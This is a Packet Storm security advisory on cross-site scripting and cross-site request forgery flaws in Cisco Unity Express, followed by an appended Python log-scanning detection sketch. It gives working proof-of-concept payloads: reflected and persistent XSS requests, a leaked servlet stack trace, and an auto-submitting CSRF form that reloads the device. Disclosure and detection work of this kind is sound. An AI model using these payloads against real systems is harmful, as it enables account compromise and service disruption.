Cisco Unity Express Cross Site Request Forgery / Cross Site Scripting

Published: 05 Feb 2013 00:00:00 | Reported by: Jacob Holcomb | Type: packetstorm | Source: packetstormsecurity.com

Multiple vulnerabilities in Cisco Unity Express, reported in December 2012 and disclosed in February 2013: CVE-2013-1114 (XSS) and CVE-2013-1120 (CSRF). Proof-of-concept code for reflected XSS and information disclosure is provided.

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Cisco Unity Express Multiple Vulnerabilities | 5 Feb 2013 00:00 | zdt |
| Circl | CVE-2013-1114 | 5 Feb 2013 00:00 | circl |
| Circl | CVE-2013-1120 | 5 Feb 2013 00:00 | circl |
| Cisco | Cisco Unity Express Cross-Site Scripting Vulnerabilities | 1 Feb 2013 20:04 | cisco |
| Cisco | Cisco Unity Express Multiple Cross-Site Request Forgery Vulnerabilities | 1 Feb 2013 20:03 | cisco |
| CVE | CVE-2013-1114 | 13 Feb 2013 23:00 | cve |
| CVE | CVE-2013-1120 | 6 Feb 2013 11:00 | cve |
| Cvelist | CVE-2013-1114 | 13 Feb 2013 23:00 | cvelist |
| Cvelist | CVE-2013-1120 | 6 Feb 2013 11:00 | cvelist |
| Exploit DB | Cisco Unity Express - Multiple Vulnerabilities | 5 Feb 2013 00:00 | exploitdb |

`# Exploit Title: Cisco Unity Express Multiple Vulnerabilities  
# Reported: December 2012  
# Disclosed: February 2013  
# Author: Jacob Holcomb of Independent Security Evaluators  
# CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120  
# http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html  
  
Cisco Advisory  
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114  
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120  
  
Proof of Concept  
XSS - CVE-2013-1114:  
GET:  
Reflective XSS & Info disclosure  
http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script>  
  
Information Disclosure  
Location: /Web/WEB-INF/screens/main.jsp  
Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp  
Internal Servlet Error:  
  
javax.servlet.ServletException: invalid character at position 1 in >  
org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source)  
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)  
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)  
WEB_0002dINF.screens.main._jspService (main.java:396)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)  
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)  
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)  
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)  
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)  
org.apache.tomcat.core.ContextManager.service (Unknown Source)  
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)  
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)  
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)  
java.lang.Thread.run (Thread.java:777)  
  
Root cause:  
java.lang.NumberFormatException: invalid character at position 1 in >  
java.lang.Throwable.<init> (Throwable.java:166)  
java.lang.Integer.parseInt (Integer.java:775)  
java.lang.Integer.parseInt (Integer.java:262)  
com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274)  
WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source)  
org.apache.jasper.runtime.PageContextImpl.include (Unknown Source)  
WEB_0002dINF.screens.main._jspService (main.java:396)  
org.apache.jasper.runtime.HttpJspBase.service (Unknown Source)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source)  
org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source)  
java.security.AccessController.doPrivileged (AccessController.java:273)  
org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source)  
org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source)  
org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759)  
org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596)  
com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157)  
org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
javax.servlet.http.HttpServlet.service (HttpServlet.java)  
org.apache.tomcat.facade.ServletHandler.doService (Unknown Source)  
org.apache.tomcat.core.Handler.invoke (Unknown Source)  
org.apache.tomcat.core.Handler.service (Unknown Source)  
org.apache.tomcat.facade.ServletHandler.service (Unknown Source)  
org.apache.tomcat.core.ContextManager.internalService (Unknown Source)  
org.apache.tomcat.core.ContextManager.service (Unknown Source)  
org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source)  
org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source)  
org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source)  
java.lang.Thread.run (Thread.java:777)  
  
  
  
POST:  
Persistent XSS  
http://X.X.X.X/Web/SA3/AddHoliday.do  
POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD  
  
  
CSRF - CVE-2013-1120:  
  
<html>  
<!-- # Exploit Title: Cisco Unity Express CSRF  
# Date: Discovered and reported December 2012  
# Disclosed: February 2013  
# Author: Jacob Holcomb of Independent Security Evaluators  
# Software: Cisco Unity Express  
# CVE : CVE-2013-1120 for the CSRF  
# Note: All the HTML forms are susceptible to forgery -->  
  
<head>  
<title>Reload Cisco Unity Express CSRF</title>  
</head>  
  
<body>  
  
<form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post">  
<input type="hidden" name="submitType" value="RELOAD"/>  
</form>  
  
<script>  
document.CUEreload.submit();  
</script>  
  
</body>  
</html>  
  
  
`
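
A detection sketch for the two issues above, added here as an example and not part of the original advisory: it scans web access logs for `ScriptList.do` requests whose `gui_pagenotableData` is not a plain integer (the stack trace shows the value reaching `Integer.parseInt`) and for `.do` POSTs whose Referer is not the device. The combined log format, the `DEVICE_HOSTS` value and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a proxy or front end in front of the device writes Apache
# combined log format; DEVICE_HOSTS is a placeholder for your CUE host(s).
DEVICE_HOSTS = {"cue.example.internal"}
LOG_RE = re.compile(
    r'\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"'
)

def classify(line):
    """Return a finding label for one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # gui_pagenotableData is parsed as an integer server-side, so any value
    # that is not plain digits is outside normal use of the paging table.
    if url.path.endswith("/ScriptList.do"):
        values = parse_qs(url.query, keep_blank_values=True).get("gui_pagenotableData", [])
        if any(not re.fullmatch(r"[0-9]+", v) for v in values):
            return "non-numeric-page-param"
    # The advisory notes every form is forgeable: flag state-changing POSTs
    # whose Referer is missing or points somewhere other than the device.
    if m["method"] == "POST" and url.path.endswith(".do"):
        try:
            ref_host = urlsplit(m["referer"]).hostname
        except ValueError:
            ref_host = None
        if ref_host is None:
            return "post-without-referer"
        if ref_host not in DEVICE_HOSTS:
            return "cross-site-post"
    return None

def scan(lines):
    """Return (line_number, label) for every flagged line."""
    return [(n, label) for n, line in enumerate(lines, 1) if (label := classify(line))]

# Constructed sample log lines (not captured traffic).
SAMPLE = [
    '192.0.2.10 - - [05/Feb/2013:10:00:01 +0000] "GET /Web/SA2/ScriptList.do?gui_pagenotableData=2 HTTP/1.1" 200 5120 "http://cue.example.internal/Web/SA2/ScriptList.do" "Mozilla/5.0"',
    '192.0.2.10 - - [05/Feb/2013:10:00:09 +0000] "GET /Web/SA2/ScriptList.do?gui_pagenotableData=%3E%3Cscript%3Ealert(42)%3C/script%3E HTTP/1.1" 500 3310 "-" "Mozilla/5.0"',
    '192.0.2.22 - - [05/Feb/2013:10:02:40 +0000] "POST /Web/SA/SaveConfiguration.do HTTP/1.1" 200 812 "http://other.example/page.html" "Mozilla/5.0"',
    '192.0.2.22 - - [05/Feb/2013:10:03:11 +0000] "POST /Web/SA3/AddHoliday.do HTTP/1.1" 200 904 "http://cue.example.internal/Web/SA3/AddHoliday.do" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, label in scan(SAMPLE):
        print(n, label)
```

A Referer check only surfaces candidates for review; the persistent XSS via `AddHoliday.do` arrives in a POST body, which access logs in this format do not record.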
